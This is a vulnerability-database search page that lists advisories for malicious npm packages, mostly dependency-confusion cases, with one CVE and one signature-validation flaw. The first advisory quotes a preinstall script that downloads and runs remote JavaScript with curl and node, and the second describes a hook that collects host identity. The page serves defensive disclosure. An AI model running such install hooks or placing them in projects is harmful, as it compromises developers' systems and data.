Lucene search
K

170 matches found

OSV
OSV
added 2026/06/11 12:38 p.m.10 views

MAL-2026-5645 Malicious code in sn-internal-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...

5.8AI score
Exploits0References3
OSV
OSV
added 2026/05/25 1:57 p.m.17 views

MAL-2026-4686 Malicious code in tempo-layout (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 795bf7080d27cef141114dd46b5734c136f762933a43f2d1308e82547c5f99a6 [email protected] ships a preinstall hook poc.js that unconditionally collects host identity os.hostname, whoami, id, network configuration...

5.8AI score
Exploits0References3
OSV
OSV
added 2025/11/12 10:25 p.m.2 views

MAL-2025-183952 Malicious code in mitaluaik-don-olikaisima (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dcce238f033b2175b177a2390a6501d040b725285c749cd917aa185c71bcca43 This package appears to be part of the tea.xyz token reward campaign that flooded npm. These packages typically contain autopublish scripts auto.js,...

6.8AI score
Exploits0
OSV
OSV
added 2024/02/05 4:15 p.m.10 views

CVE-2024-23054

An issue in Plone Docker Official Image 5.2.13 5221 open-source software that could allow for remote code execution due to a package listed in ++plone++static/components not existing in the public package index npm...

9.8CVSS6.4AI score0.01678EPSS
Exploits1References3
Veracode
Veracode
added 2023/11/09 5:40 a.m.12 views

Improper Validation Of Attestations Signature

github.com/slsa-framework/slsa-verifier is vulnerable to Improper Validation Of Attestations Signature. An attacker could exploit this vulnerability by creating a malicious package and publishing it to a public npm registry. When a user installs the package, the slsa-verifier would verify the...

7.8AI score
Exploits0
Snyk
Snyk
added 2023/06/06 8:20 a.m.2 views

Malicious Package

Overview oci-console-regions is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this packa...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/06/06 8:20 a.m.2 views

Malicious Package

Overview coveofordynamics-search-ui-seed is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable i...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/06/06 8:20 a.m.3 views

Malicious Package

Overview react-influxdb is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this package wa...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/06/06 8:20 a.m.2 views

Malicious Package

Overview gfg-cicd-scripts is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this package...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/06/06 8:20 a.m.5 views

Malicious Package

Overview rfs-utils is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this package was...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/06/06 8:20 a.m.2 views

Malicious Package

Overview @chegg-me-lpc/utils is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this packa...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/06/06 8:20 a.m.3 views

Malicious Package

Overview blablablabla is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this package was...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/06/06 8:20 a.m.5 views

Malicious Package

Overview native-svg is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this package was...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/05/16 8:19 a.m.3 views

Malicious Package

Overview tests-final is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this package was...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/04/04 8:19 a.m.3 views

Malicious Package

Overview jb-abtest is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this package was...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/04/04 8:19 a.m.2 views

Malicious Package

Overview arriva-ui-lib is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this package was...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/04/04 8:19 a.m.3 views

Malicious Package

Overview fancode-fc-tools is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this package...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/04/04 8:19 a.m.3 views

Malicious Package

Overview yahoodotcom-layout is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this packag...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/03/28 8:19 a.m.3 views

Malicious Package

Overview cirrus-matchmaker is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this package...

9.8CVSS7.1AI score
Exploits0References3
Snyk
Snyk
added 2023/03/14 8:19 a.m.2 views

Malicious Package

Overview egstore-query is a malicious package. The package's name is based on existing repositories, namespaces, or components used by popular companies in an effort to trick employees into downloading it, also known as 'dependency confusion'. Therefore, you're only vulnerable if this package was...

9.8CVSS7.1AI score
Exploits0References3
Rows per page
Query Builder